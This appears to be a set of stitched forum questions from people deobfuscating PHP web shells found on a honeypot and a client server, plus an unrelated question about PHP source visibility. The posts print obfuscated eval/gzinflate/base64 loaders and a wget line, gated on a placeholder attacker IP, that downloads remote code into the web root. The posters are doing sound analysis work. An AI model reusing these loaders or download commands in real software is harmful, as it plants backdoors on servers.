Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 7 years ago.
Improve this question
One of my honeypot systems has a pretty interesting PHP shell on it, i've been trying to decode it, but I'm not having any luck getting the contense of the gzinflated b64 encoded part of the script.
Maybe someone with a little more experience with deobfuscating could take a look at it?
Here's the original pastebin they used to download to my honeypot:
http://pastebin.com/1w59Ew9S
<?php if($_SERVER["REMOTE_ADDR"] =='ATTACKER_IP') {#system('wget http://pastebin.com/raw.php?i=1w59Ew9S -O /www/index.php;ls -la /www/index.php');exit; }?>
I attempted to deobfucsate it myself by printing variables in different places, but i can't for the life of me get the contents to print out.
Here's my attempt at making it a little bit more human readable:
http://pastebin.com/BRbyVzyZ
Related
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 3 years ago.
Improve this question
I'm trying to de-obfuscate this script found on a client system with no luck so far.
<?php function LwAC($SvniN)
{
$SvniN=gzinflate(base64_decode($SvniN));
for($i=0;$i<strlen($SvniN);$i++)
{
$SvniN[$i] = chr(ord($SvniN[$i])-1);
}
return $SvniN;
}eval(LwAC("NL3XrutckqX7AAXUOyQadZEFokHv0KcuRFISRS+SotFBo0Ereu8b/ewnVtepvMhEZu5/7SXDOSNGjPHFP/7x96987ZKl7Lt/TJ9g/fzz3zxRfMj//q//8r//8a//8p//5T9+V9nlTbRk/4yjOWOo/5VmSZ9m//Vn//1//Ou//CPvp3/+W/kf2P/4t/L/mZepybr/+r/hf0EQ+IH/+N//9QP/338r/+c//uMfSTH9s5/S///P/f2P//7f8f/7w/4P/OkpW9ap+8d//gp/f8P/ybao+ed//pb/jbVwskGsZ10mOspw/JflJTfCCb8ZXr/yIfxkjbz17+It/MTCDBLTnXayuGWdQlpor9RekOIj40+rH+VWgrKzNk675Nj192nfY/QlCIrlsrmVo/xGWShjoR8BRRcU4bVhRcuAaLt4oJGsG3g0u2kCQWdHtO3dRHeTton5MTpat/c5msWKhKndxa7dIOOMsvtVuzvTy75zkWaMJErk3+WcuHGk9RxDX+JPf2UVXZzBUSSPXFZ5bew0JU+SOktF1d2a9czZqx6Iz+7lmzu5N1R+1YtFsDFNI0gYFII1BgFLZ+K25+xsoZmoPtXtmffjqHKrkK5YlTxz84dkKKq9WzRrR3YY2WhiWY7+OJMwkgjBrvxQ4Cj2TbftuM2a323oRsQpclb0klrwT7ouhhQ1mwsY//ff7x+BonLjgaYRJe0pfBzPpkcdLyCPh80zMcoifdaF95GRaRbhUH4v6KSIXiYRhHHbsN+rXZmp5SVUlmwDzy9HkAMvvdff/B2kH1o/kehjrCOaWbF2qd1EVtFb2+fs66Cvjd+1ZSU4ZPQSCjtR4SFXvGt7CPN9lZlInF8DQVH61dmpwvPO80hU7Y4ggePh5BtdNIyOyLeDRhNT7lWSKXXkPZOUM0jx9q7Yi1XxqjD6J/IlSfgxKrOneYyd7kGvi0cjG8umKGcxxiJNjGKZx+SRTZpr5HTBH49z9O8/vg9CyawztvoAV8k1tZ7O0XbR96LHE91ygorwn52StKO98l9NY7zFU2vzy8cpZZF2vlftkrmkfAW7s4prjfMckiy21XYab2GJhGZci7oIx0cVj+xr20h4iYV8tjwD4yCo60u6cVwhsfvIO46p0Y/WkjGPwj9Gfhqe893FniWX+nonTn7QjRqZCb4+Qsrz/GhZFEIt99Jy2BxFV/KT0gdKHg29GFmebyJDdA2G"));?>
Please note that I have to remove plenty of the codes before this "));?>
A very big thank you to everyone who took their time to go through this question and put in advice/direction in attempt to deobfuscate this PHP code. Special thanks to #Hasta Dhana.
Now, taking into consideration the recommendation of #digijay to do this on a virtual machine where it can simply be deleted if anything goes wrong, the use of an online php compiler as recommended and used by #Hasta Dhana was an awesome choice. All I had to do was to paste in the whole code, change the eval to echo and run it. That, successfully had the work done and pretty fast except that the output was however obfuscated in the exact same way. This time the solution is as simple as deobfuscate the output repeating the same actions that get us here. Which is to copy the whole of the output and change the eval in it to echo then run it and hurray there we have the script deobfuscated.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
My php file online has permission settings 444 - ('readable' for everyone)
When I open the file in Firefox, it correctly only shows the output of the file (meaning things that are echoed or printed)
I want people to NOT EVER see the inside of the php file because it shows sensitive information. So - are there some people that are able to look into the inside of the php file?
Unless someone has access to the server then generally no.
There are ways to purposely make the source code visible however.
http://php.net/manual/en/function.show-source.php
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
I would like to decode this PHP page. I tried with this site but when I decode code, the code is still encrypted :/
Can we help me please ?
Page encrypted:
<?php
$_F=__FILE__;
$_X='P2lCP1ouWj4NVk16ek96X3pNWk96PXNIeChhKTsNVg1WDVYkOU9ZZXNIUyRfcEtnNktnaid0VFRtX3Q3cFQnZDsNViRaek85UTI9UyIzSG49ZUg9PklNZTluPkNNSE16ZT1Pej4wYSI7DVYkV3MyTUhuTXBNemNNej5TPiIuPT1aOmhoZTI9c2NlPU0tV3MyTUhuTVgyT1loZTI9c2NlPU1oek1uT1F6Mk1uaDIuTTJ5TXpYWi5aIjsNVj4+Pj4NViRaT249Y2VXUU1TIjlPWWVzSFMkOU9ZZXNIJlp6TzlRMj1TIlhReldNSDJPOU0oJFp6TzlRMj0pOw1WDVYkMi4+Uz4yUXpXX3NIcz0oKTsNVjJReldfbk09T1o9KCQyLiwvIGdJN21UX2dLVCBnRVRnRkVwcktnLD4wKTsNVjJReldfbk09T1o9KCQyLiw+LyBnSTdtVF8gZ0ksPiRXczJNSG5NcE16Y016KTsNVjJReldfbk09T1o9KCQyLiw+LyBnSTdtVF9tN3BULD49elFNKTsNVjJReldfbk09T1o9KCQyLiw+LyBnSTdtVF9tN3BUcjNLSTRwLD4kWk9uPWNlV1FNKTsNViR6TW5RVz1TMlF6V19NUk0yKCQyLik7DVYyUXpXXzJXT25NKCQyLik7Pj4NVg1WDVZzQT4oJHpNblFXPT5CaT4iSXMyTUhuTT42ZVdzOSI+ZUg5PiR6TW5RVz0+Qmk+IklzMk1Ibk0+M0hjZVdzOSIpDVY5c00+KCJULk16TT59ZW4+ZUg+c25uUU0+Mk9ISE0yPXNIeD49Tz49Lk0+V3MyTUhuTT5uTXpjTXpYIik7DVYNViRXczJNSG5NX249ZT1RblMkek1uUVc9Ow1WDVZzQSgkV3MyTUhuTV9uPWU9UW4+U1M+IklzMk1Ibk0+NmVXczkiKT5dPg1WDVYNVg1WDVYNVg1WDVYNVg1WDVZ6TXZRc3pNX09IMk0oInNIMmhuTW5uc09IWFouWiIpOw1Wek12UXN6TV9PSDJNKCJzSDJoc25PPU9aTVhaLloiKTsNVnpNdlFzek1fT0gyTSgic0gyaEFPell4TUhYWi5aIik7DVYNViQ9V1Nzbk89T1pNX1dPZTkoZXp6ZXEoKSwiPU1ZWldlPU1uaDlNQWVRVz1Ycz09Iik7DVYkPWNTZXp6ZXEoKTsNVg1WTzxfbj1lej0oKTsNVg1WDVY/aQ1WDVYNVkIhNDcvVGJtSz4uPVlXPm0gb0kzLz4iLWhoe0ovaGg0VDQ+RHRUdUk+MFhhPlR6ZUhucz1zT0hlV2hoS0UiDVYiLj09WjpoaH19fVh9SlhPenhoVGdoUi49WVcwaDRUNGhSLj1ZVzAtPXplSG5zPXNPSGVXWDk9OSJpDVZCLj1ZVz5SWVdIblMiLj09WjpoaH19fVh9SlhPenhoMFBQUGhSLj1ZVyI+V2VIeFMiTUgiPlJZVzpXZUh4UyJNSCJpDVZCLk1lOWkNVglCWU09ZT4uPT1aLU12UXNjUyIvT0g9TUg9LVRxWk0iPjJPSD1NSD1TIj1NUj1oLj1ZVzs+Mi5lem5NPVNzbk8tZmZMUC0wIj5oaQ1WCUI9cz1XTWkzSG49ZUg9PklNZTluPkNNSE16ZT1Pej4wYVhhQmg9cz1XTWkNVglCbjJ6c1o9Pj1xWk1TIj1NUj1oCmVjZW4yenNaPSI+bnoyUyIKbmgKdlFNenEtMFhbWGtYCm4iaUJobjJ6c1o9aQ1WCUJuMnpzWj0+PXFaTVMiPU1SPWgKZWNlbjJ6c1o9Ij5uejJTIgpuaFFzaFFzWDJPek1YCm4iaUJobjJ6c1o9aQ1WCUJuMnpzWj0+PXFaTVMiPU1SPWgKZWNlbjJ6c1o9Ij5uejJTIgpuaFFzaFFzWH1zOXhNPVgKbiJpQmhuMnpzWj1pDVYJQm4yenNaPT49cVpNUyI9TVI9aAplY2VuMnpzWj0iPm56MlMiCm5oUXNoUXNYWU9Rbk1YCm4iaUJobjJ6c1o9aQ1WCUJuMnpzWj0+PXFaTVMiPU1SPWgKZWNlbjJ6c1o9Ij5uejJTIgpuaG5RWk16QXNuLlgKbiJpQmhuMnpzWj1pDVYJQm4yenNaPT49cVpNUyI9TVI9aAplY2VuMnpzWj0iPm56MlMiCm5oV3NjTV9uTWV6Mi5YCm4iaUJobjJ6c1o9aQ1WCUJuMnpzWj0+PXFaTVMiPU1SPWgKZWNlbjJ6c1o9Ij5uejJTIgpuaD1PT1c9c1pYCm4iaUJobjJ6c1o9aQ1WCUJuMnpzWj0+PXFaTVMiPU1SPWgKZWNlbjJ6c1o9Ij5uejJTIgpuaDJPT3lzTVgKbiJpQmhuMnpzWj1pDVYJQm4yenNaPT49cVpNUyI9TVI9aAplY2VuMnpzWj0iPm56MlMiCm5oUXNoUXNYbk96PWU8V01YCm4iaUJobjJ6c1o9aQ1WCUJuMnpzWj0+PXFaTVMiPU1SPWgKZWNlbjJ6c1o9Ij5uejJTIgpuaFFzaFFzWDl6ZXh4ZTxXTVgKbiJpQmhuMnpzWj1pDVYJQm4yenNaPT49cVpNUyI9TVI9aAplY2VuMnpzWj0iPm56MlMiCm5oUXNoUXNYek1uczVlPFdNWApuImlCaG4yenNaPWkNVglCbjJ6c1o9Pj1xWk1TIj1NUj1oCmVjZW4yenNaPSI+bnoyUyIKbmhRc2hRc1haT25zPXNPSFgKbiJpQmhuMnpzWj1pDVYJQm4yenNaPT49cVpNUyI9TVI9aAplY2VuMnpzWj0iPm56MlMiCm5oUXNoUXNYPFE9PU9IWApuImlCaG4yenNaPWkNVglCbjJ6c1o9Pj1xWk1TIj1NUj1oCmVjZW4yenNaPSI+bnoyUyIKbmhRc2hRc1g5c2VXT3hYCm4iaUJobjJ6c1o9aQ1WCUJuMnpzWj0+PXFaTVMiPU1SPWgKZWNlbjJ6c1o9Ij5uejJTIgpuaDJRbj1PWVgKbiJpQmhuMnpzWj1pDVYJDVYJQldzSHk+LnpNQVMiMm5uaFFzaFFzWDxlbk1YMm5uIj56TVdTIm49cVdNbi5NTT0iPllNOXNlUyJlV1ciPmhpDVYNVglCV3NIeT4uek1BUyIybm5oUXNoUXNYV094c0hYMm5uIj56TVdTIm49cVdNbi5NTT0iPllNOXNlUyJlV1ciPmhpDVYNVglCV3NIeT4uek1BUyIybm5oPS5NWU1uaGVaWldNX1pzTWhRc1gybm4iPnpNV1Mibj1xV01uLk1NPSI+WU05c2VTImVXVyI+aGkNVg1WCUJXc0h5Pi56TUFTIjJubmg9Lk1ZTW5oZVpaV01fWnNNaFFzWDJubiI+ek1XUyJuPXFXTW4uTU09Ij49cz1XTVMibj1xV00iPllNOXNlUyJlV1ciPmhpDVYNVglCIS0tanNBPjNLPltkaQ1WCUJXc0h5Pi56TUFTIjJubmhzTVtYMm5uIj56TVdTIm49cVdNbi5NTT0iPllNOXNlUyJlV1ciPmhpDVYJDVYJQm4yenNaPT5uejJTIgpuaFpIeEFzUlgKbiJpQmhuMnpzWj1pDVYJQm4yenNaPWkNVgk+PmgqPnJzUj4zS1s+VHplSG5aZXpNSD0+bUVDPipoDVYJPj40NF88TVdlPU05bUVDWEFzUignWFdPeE8sPlhPPS5Nej5RVyM5ZW4uPE9lejktPFE9PU9Ibj5Xcz5lJyk7DVYNVglCaG4yenNaPWkNVglCIWpNSDlzQWQtLWkNVglCIS0tanNBPjNLPjFkaQ1WCUJXc0h5Pi56TUFTIjJubmhzTTFYMm5uIj56TVdTIm49cVdNbi5NTT0iPllNOXNlUyJlV1ciPmhpDVYJQiFqTUg5c0FkLS1pDVZCaC5NZTlpDVYNVg1WQjxPOXFpDVYJQjlzYz5zOVMiWmV4TV99emVaWk16ImkNVgkJQjlzYz5zOVMiWmV4TS0uTWU5TXoiaQ1WCQkJQjlzYz5zOVMiWmV4TS0uTWU5TXotfXplWlpNeiJpDVYJCQkJQjlzYz5zOVMiPU9aImkNVgkJCQkJQmU+LnpNQVMiIyI+Mldlbm5TIldPeE8iPj1zPVdNUyIzSG49ZUg9PklNZTluPkNNSE16ZT1Pej4+MGFYYSJpM0huPWVIPT5JTWU5bj5DTUhNemU9T3o+MGFYYUJoZWkNVgkJCQkJQjlzYz4yV2VublMifU1XMk9ZTSJpDVYJCQkJCQlCblplSD4yV2VublMiSE89TSJpe01XMk9ZTT49Tz5xT1F6PldPeHNIPlpleE0hPkJlPi56TUFTIiMiPj1zPVdNUyJ7TVcyT1lNPj1PPnFPUXo+V094c0g+WmV4TSEiaUJoZWlCaG5aZUhpDVYJCQkJCQlCZT4yV2VublMiPD1IPlFzLW49ZT1NLTlNQWVRVz0+UXMtMk96SE16LWVXVyI+LnpNQVMiIyJpDVYJCQkJCQkJQm5aZUg+Mldlbm5TIlFzLXMyT0g+UXMtczJPSC19ek1IMi4iaUJoblplSGkNVgkJCQkJCQlwTT09c0h4bg1WCQkJCQkJQmhlaQ1WCQkJCQkJQmU+Mldlbm5TIjw9SD5Rcy1uPWU9TS05TUFlUVc9PlFzLTJPekhNei1lV1ciPi56TUFTIiMiaQ1WCQkJCQkJCUJuWmVIPjJXZW5uUyJRcy1zMk9IPlFzLXMyT0gtWk16bk9IImlCaG5aZUhpDVYJCQkJCQkJdXE+ZTIyT1FIPQ1WCQkJCQkJQmhlaQ1WCQkJCQkJQmU+Mldlbm5TIjw9SD5Rcy1uPWU9TS05TUFlUVc9PlFzLTJPekhNei1lV1ciPi56TUFTIiMiaQ1WCQkJCQkJCUJuWmVIPjJXZW5uUyJRcy1zMk9IPlFzLXMyT0gtWk99TXoiaUJoblplSGkNVgkJCQkJCQlJT3hPUT0NVgkJCQkJCUJoZWkJCQkJCQkNVgkJCQkJQmg5c2NpDVYJCQkJQmg5c2NpDVYJCQlCaDlzY2kNVgkJDVZCbjJ6c1o9Pj1xWk1TIj1NUj1oCmVjZW4yenNaPSI+bnoyUyIKbmhRc2hRc1g9ZTxuWApuImlCaG4yenNaPWkNVkJuMnpzWj0+PXFaTVMiPU1SPWgKZWNlbjJ6c1o9ImkNVj4+Pj4NVg1WPj4+Pg1WJCg5TzJRWU1IPSlYek1lOXEoQVFIMj1zT0goKT5dDVYJaGg+VGU8bg1WCSQoJyM9ZTxuLD4jPWU8bmssPiM9ZTxuTCcpWD1lPG4oKTsNVj4+Pj4+Pj4+DVY+Pj4+Pj4+Pj4NVj4+Pj4+Pj4+Pg1WPj4+Pj4+Pj5jZXo+OS5Nc3guPT5TPiQoOU8yUVlNSD0pWC5Nc3guPSgpOw1WPj4+Pj4+Pj5jZXo+OX1zOT0uPlM+JCg5TzJRWU1IPSlYfXM5PS4oKTsNVj4+Pj4+Pj4kKCcjOXNjQU9PPU16JylYMm5uKCc9T1onLCg5Lk1zeC49LTBhYSkrJ1pSJyk7DVY+Pj5jZXo+WWV6eHNIV01BPT5TPig5fXM5PS4tJCgnIzlzY0FPTz1NeicpWH1zOT0uKCkpaGs7DVY+Pj4kKCcjOXNjQU9PPU16JylYMm5uKCdXTUE9JyxZZXp4c0hXTUE9KydaUicpOw1WPj4NVmwpOw1WQmhuMnpzWj1pDVYJCUI5c2M+czlTIm5RPC1IZWMiaQ1WCQkJQjlzYz4yV2VublMiWmV4TS09cz1XTSJpDVYJCQkJQi4waUlPeHNIPkZ6TWVCaC4waQ1WCQkJCUJuWmVIaUlPek1ZPnNablFZPjlPV096Pk1SZVlaV01CaG5aZUhpDVYJCQlCaDlzY2kNVgkJQjlzYz5zOVMiPU9aLTxRPT1PSG4iaQ1WDVYNVg1WDVYNVg1WDVYNVg1WDVYJCQlCUVc+Mldlbm5TIjl6T1otOU99SCJpDVYJCQkJQldzaQ1WCQkJCQlCZT4yV2VublMiPD1IPlFzLW49ZT1NLTlNQWVRVz0+UXMtMk96SE16LWVXVyI+LnpNQVMiCmVjZW4yenNaPTpjT3M5KGEpOyJpDVYJCQkJCQlCblplSD4yV2VublMiUXMtczJPSD5Rcy1zMk9ILTJlemU9LWstSC1uImlCaG5aZUhpDVYJCQkJCQkvLmVIeE0+VC5NWU0NVgkJCQkJQmhlaQ1WCQkJCQlCUVc+czlTIm49cVdNLW59cz0yLk16Ij4yV2VublMiOXpPWi05T31ILTJPSD1lc0hNej48T1I+UXMtfXM5eE09PlFzLX1zOXhNPS0yT0g9TUg9PlhRcy0yT3pITXotPVc+WFFzLTJPekhNei09eiJpDVYJCQkJCQlCV3NpDVYJCQkJCQkJQmU+czlTIjxXZTJ5X3pPbk0iPi56TUFTIiMiPjJXZW5uUyI8PUg+UXMtbj1lPU0tOU1BZVFXPT5BUVdXLVdzSHk+UXMtMk96SE16LWVXVz5uTT1fPS5NWU0iPj1zPVdNUyJvV2UyeT5nT25NPlQuTVlNImkNVgkJCQkJCQkJQm5aZUg+Mldlbm5TIlFzLXMyT0g+UXMtczJPSC01T09Zc0giaUJoblplSGkNVgkJCQkJCQkJb1dlMnk+Z09uTT5ULk1ZTQ1WCQkJCQkJCUJoZWkNVgkJCQkJCUJoV3NpDVYJCQkJCQlCV3NpDVYJCQkJCQkJQmU+czlTInh6ZXFfbj1lSDllejkiPi56TUFTIiMiPjJXZW5uUyI8PUg+UXMtbj1lPU0tOU1BZVFXPT5BUVdXLVdzSHk+UXMtMk96SE16LWVXVz5uTT1fPS5NWU0iPj1zPVdNUyJDemVxPnA9ZUg5ZXo5PlQuTVlNImkNVgkJCQkJCQkJQm5aZUg+Mldlbm5TIlFzLXMyT0g+UXMtczJPSC01T09Zc0giaUJoblplSGkNVgkJCQkJCQkJQ3plcT5wPWVIOWV6OT5ULk1ZTQ1WCQkJCQkJCUJoZWkNVgkJCQkJCUJoV3NpDVYJCQkJCQlCV3NpDVYJCQkJCQkJDVYJCQkJCQkJQmU+czlTImVaWldNX1pzTSI+LnpNQVMiIyI+Mldlbm5TIjw9SD5Rcy1uPWU9TS05TUFlUVc9PkFRV1ctV3NIeT5Rcy0yT3pITXotZVdXPm5NPV89Lk1ZTSI+PXM9V01TIkZaWldNPm1zTT5ULk1ZTSJpDVYJCQkJCQkJCUJuWmVIPjJXZW5uUyJRcy1zMk9IPlFzLXMyT0gtNU9PWXNIImlCaG5aZUhpDVYJCQkJCQkJCUZaWldNPm1zTT5ULk1ZTQ1WCQkJCQkJCUJoZWkNVgkJCQkJCUJoV3NpDVYJCQkJCQlCV3NpDVYJCQkJCQkJQmU+czlTIjxXUU08TXp6cSI+LnpNQVMiIyI+Mldlbm5TIjw9SD5Rcy1uPWU9TS05TUFlUVc9PkFRV1ctV3NIeT5Rcy0yT3pITXotZVdXPm5NPV89Lk1ZTSI+PXM9V01TIm9XUU08TXp6cT5ULk1ZTSJpDVYJCQkJCQkJCUJuWmVIPjJXZW5uUyJRcy1zMk9IPlFzLXMyT0gtNU9PWXNIImlCaG5aZUhpDVYJCQkJCQkJCW9XUU08TXp6cT5ULk1ZTQ1WCQkJCQkJCUJoZWkNVgkJCQkJCUJoV3NpCQkJCQkNVgkJCQkJQmhRV2kNVgkJCQlCaFdzaQ1WCQkJQmhRV2kJDVYJCUJoOXNjaQ1WCQkJDVYNVg1WDVYNVg1WDVYNVg1WDVYNVg1WDVYNVg1WCQlCaDlzY2kNVg1WDVYJCUI5c2M+Mldlbm5TIjJXTWV6ImlCaDlzY2kNVg1WDVYNVgkJQjlzYz5zOVMiWmV4TS1XZXFPUT0iaQ1WCQkJQjlzYz5zOVMiWmV4TS0yT0g9TUg9ImkNVgkJCQlCOXNjPnM5UyJaZXhNLTJPSD1NSD0tfXplWlpNeiJpDVYNVgkJCQlCOXNjPnM5UyI9ZTxuImkNVgkJCQkJQlFXaQ1WDVYJCQkJCQlCV3NpQmU+LnpNQVMiI1dPeHNIImlJT3hzSEJoZWlCaFdzaQ1WCQkJCQkJQldzaUJlPi56TUFTIiM9ZTxuLWsiaWdNeHNuPU16QmhlaUJoV3NpDVYJCQkJCQlCV3NpQmU+LnpNQVMiIz1lPG4tSiJpZ00yT2NNej5aZW5ufU96OUJoZWlCaFdzaQ1WCQkJCQlCaFFXaQ1WCQkJCQlCOXNjPnM5UyJXT3hzSCJpDVYJCQkJCQlCOXNjPjJXZW5uUyJ6TW5aT0huTS1Zbng+blEyMk1ubj5Rcy0yT3pITXotZVdXImkNVgkJCQkJCQlCblplSGlJT3hzSD49Tz5iT1F6PkYyMk9RSD1CaG5aZUhpVE8+V094c0g+PU8+cU9Rej5lMjJPUUg9Pk1IPU16PnFPUXo+UW5NekhlWU0+ZUg5Plplbm59T3o5PmVIOT4yV3MyeT4iSU94c0giWA1WCQkJCQkJQmg5c2NpDVYJCQkJCQlCQU96WT5ZTT0uTzlTIlpPbj0iPmUyPXNPSFMiWnpPMk1ublhaLloiPkhlWU1TIjllPWVfQU96WSJpDVYJCQkJCQkJQlFXaQ1WCQkJCQkJCQlCV3NpDVYJCQkJCQkJCQlCV2U8TVc+QU96UyJIZVlNIj4yV2VublMiOU1uMiJpDVYJCQkJDVYJCQkJCQkJCQkJIG5NekhlWU06DVYJCQkJCQkJCQlCaFdlPE1XaQ1WCQkJCQkJCQkJQjlzY2kNVgkJCQkJCQkJCQlCc0haUT0+PXFaTVMiPU1SPSI+PWU8c0g5TVJTIjAiPlllUldNSHg9LlMia0xMIj5jZVdRTVMiIj4yV2VublMiQXNNVzk+PU1SPT5BUVdXIj5IZVlNUyJIZVlNIj5zOVMiSGVZTSI+aGkNVgkJCQkJCQkJCUJoOXNjaQ1WCQkJCQkJCQlCaFdzaQ1WCQkJCQkJCQlCV3NpDVYJCQkJCQkJCQlCV2U8TVc+QU96UyJaZW5uIj4yV2VublMiOU1uMiJpDVYJCQkJCQkJCQkJbWVubn1Pejk6DVYJCQkJCQkJCQlCaFdlPE1XaQ1WCQkJCQ1WCQkJCQkJCQkJQjlzY2kNVgkJCQkJCQkJCQlCc0haUT0+PXFaTVMiWmVubn1PejkiPj1lPHNIOU1SUyIwIj5ZZVJXTUh4PS5TImtMTCI+Y2VXUU1TIiI+Mldlbm5TIkFzTVc5Pj1NUj0+QVFXVyI+SGVZTVMiWmVubiI+czlTIlplbm4iPmhpDVYNVg1WDVYJCQkJCQkJCQlCaDlzY2kNVkJoV3NpDVYNVgkJCQkJCQkJQldzPjJXZW5uUyI8UT09T0huImkNVgkJCQkJCQkJCUI5c2NpDVYJCQkJCQkJCQkJQjxRPT1PSD4yV2VublMiUXMtbj1lPU0tOU1BZVFXPT5Rcy0yT3pITXotZVdXPkFXT2U9LXpzeC49PlFzLTxRPT1PSCI+PXFaTVMiblE8WXM9ImlJT3hzSEJoPFE9PU9IaQ1WCQkJCQkJCQkJQmg5c2NpDVYJCQkJCQkJCUJoV3NpDVYJCQkJCQkJQmhRV2kNVgkJCQkJCQlCc0haUT0+PXFaTVMiLnM5OU1IIj5IZVlNUyJlMj1zT0giPmNlV1FNUyJXT3hzSCJpDVYJCQkJCQlCaEFPellpDVYJCQkJCUJoOXNjaQ1WCQkJCQlCOXNjPnM5UyI9ZTxuLWsiaQ1WDVZCOXNjPjJXZW5uUyJ6TW5aT0huTS1Zbng+blEyMk1ubj5Rcy0yT3pITXotZVdXImkNVgkJCQkJCQlCblplSGkvek1lPU0+ZUg+RjIyT1FIPSFCaG5aZUhpL1dzMnk+ZT48UT09T0g+PE1XT30+PU8+MnpNZT1NPk1zPS5Nej5lPi9Rbj1PWU16PkYyMk9RSD0+T3o+ZUg+PkZBQXNXc2U9TT5GMjJPUUg9WA1WCQkJCQkJQmg5c2NpDVYNVg1WDVYNVg1WDVZCWmkNVg1WDVZCc0haUT0+bj1xV00+UyJBV09lPTpXTUE9Ij4yV2VublMiUXMtbj1lPU0tOU1BZVFXPT5Rcy0yT3pITXotZVdXPkFXT2U9LXpzeC49PlFzLTxRPT1PSCI+PXFaTT5TPic8UT09T0gnPmNlV1FNPlM+Jy96TWU9TT5lPi9Rbj1PWU16PkYyMk9RSD0nPk9IMldzMnk+Uz4ifXNIOU99WFdPMmU9c09IWC56TUE+Uz4nek14c249TXpfPFFxTXpYWi5aPzJRbj1PWU16JyJpJkg8blo7Jkg8blo7DVZCc0haUT0+Mldlbm5TIlFzLW49ZT1NLTlNQWVRVz0+UXMtMk96SE16LWVXVz5BV09lPS16c3guPT5Rcy08UT09T0giPj1xWk0+Uz4nPFE9PU9IJz5jZVdRTT5TPicvek1lPU0+ZUg+RkFBc1dzZT1NPkYyMk9RSD0nPk9IMldzMnk+Uz4ifXNIOU99WFdPMmU9c09IWC56TUE+Uz4nek14c249TXpfZUFBc1dzZT1Na1haLlonImkmSDxuWjsNVkJoWmkNVg1WDVYNVg1WDVYNVkI5c2M+Mldlbm5TIjJXTWV6ImlCaDlzY2kNVg1WDVYNVg1WCQkJCQkJDVYNVg1WDVYNVg1WDVYJCQkJCQlCOXNjaQ1WDVYNVgkJCUJoOXNjaQ1WCQkJCQkJCQlCaFdzaQ1WDVYJCQkJCQkJQmhRV2kNVg1WDVYNVg1WDVYNVgkJCQkJCQkJCUJoOXNjaQ1WDVYNVg1WDVYNVgkJCQkJQjlzYz5zOVMiPWU8bi1KImkNVkI5c2M+Mldlbm5TInpNblpPSG5NLVlueD5uUTIyTW5uPlFzLTJPekhNei1lV1ciaQ1WCQkJCQkJCUJuWmVIaWdNbk09PXNIeD5iT1F6Pm1lbm59T3o5QmhuWmVIaTNBPnFPUT4uZWNNPldPbj0+cU9Rej5aZW5ufU96OT5xT1E+MmVIPk1lbnNXcT56TW5NPT5zPT48cT4yV3MyeXNIeD49Lk0+PE89PU9IPjxNV099PmVIOT5NSD1NenNIeD5xT1F6PlFuTXpIZVlNPmVIOT5NWWVzVz5lOTl6TW5uWA1WCQkJCQkJQmg5c2NpDVYNVg1WDVYNVg1WDVYNVgkJCQkJCUJBT3pZPmUyPXNPSFMiQU96eFplbm5YWi5aImkNVgkJCQkJCQlCUVdpDVYJCQkJCQkJCUJXc2kNVg1WDVYJCQkJCQkJCUJoV3NpDVYJCQkJCQkJCUJXcz4yV2VublMiPFE9PU9IbiJpDVYJCQkJCQkJCQlCOXNjaQ1WCQkJCQkJCQkJCUI8UT09T0g+Mldlbm5TIlFzLW49ZT1NLTlNQWVRVz0+UXMtMk96SE16LWVXVz5BV09lPS16c3guPT5Rcy08UT09T0giPj1xWk1TIm5RPFlzPSJpcE1IOT5ITX0+WmVubn1PejlCZT4uek1BUyJBT3p4WmVublhaLloiQmhlaUJoPFE9PU9IaQ1WCQkJCQkJCQkJQmg5c2NpDVYJCQkJCQkJCUJoV3NpDVYJCQkJCQkJQmhRV2kNVg1WDVYNVgkJCQkJCUJoQU96WWkNVg1WDVYJCUJoUVdpDVYJCQkJCUI5c2M+Mldlbm5TIjJXTWV6ImlCaDlzY2kNVgkJCQlCaDlzY2kNVg1WDVYNVgkJCQkNVg1WCQkJQmg5c2NpCQkJCQkJDVYJCQkJDVYJCQlCOXNjPjJXZW5uUyIyV01leiJpQmg5c2NpDVYJCUJoOXNjaQ1WCUJoOXNjaQ1WDVYNVg1WPj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj5COXNjPnM5PlMiOXNjQU9PPU16Ij5uPXFXTT5TIlpPbnM9c09IOj5lPG5PV1E9TTs+ImlCP1ouWj5zSDJXUTlNKCdBT089TXpYWi5aJyk7Pg1WDVYNVg1WDVYNVg1WDVYNVg1WDVYNVg1WDVYNVg1WDVYNVg1WDVYNVg1WbA1WDVZNV25NPl0NVg1WaCo+NE1BZVFXPT5NenpPej5ZTW5uZXhNPipoDVYNVk0yLk8+IkI5c2M+ZVdzeEhTXCIyTUg9TXpcImkNVg1WQj1lPFdNPn1zOT0uU1wiMGFhJVwiPjxPejlNelNcImFcIj5uPXFXTVNcIlplOTlzSHg6MExaUjs+PE96OU16LTJPV096OiNyYWE7PjxPejlNei1uPXFXTTpuT1dzOTs+PGUyeXh6T1FIOS0yT1dPejojcnJbLzFhOz5BT0g9LUFlWXNXcTpUZS5PWWUsPkNNSE1jZSw+bmVIbi1uTXpzQTs+QU9IPS1uczVNOjBrWlI7PjJPV096On0ucz1NO1wiaQ1WDVZCPXppDVYNVkI9OWlCPGliT1F6PjlPWWVzSD5IZVlNPjlPTW4+SE89Pi5lY00+ZT5jZVdzOT5XczJNSG5NPnlNcT49Tz5NUk0yUT1NPiRaek85UTI9WEJoPGlCaD05aQ1WDVZCaD16aQ1WDVZCaD1lPFdNaQ1WDVZCaDlzY2kiOw1WDVZsDVYNVj9p';
$_D=strrev('edoced_46esab');
eval($_D('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCdTZ1BPOVlaV0ZLbXF5ZnhjakxKUnp1TTV2TnRzMWIue0I0bkNdaS8yRGwwRWhlQQpbZDg9UXA+VlhvIEh9NkdJdzdrYTNUclU8JywnPVI5b2RtcGxBRVB5azhndls1M3hyTWV6cVpIaTdZaFc8RHNHez5DY1h9MU4vYWZqNl1KdHVTIAouQlVud1ZLTFFPMjBJVEY0YicpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw='));
?>
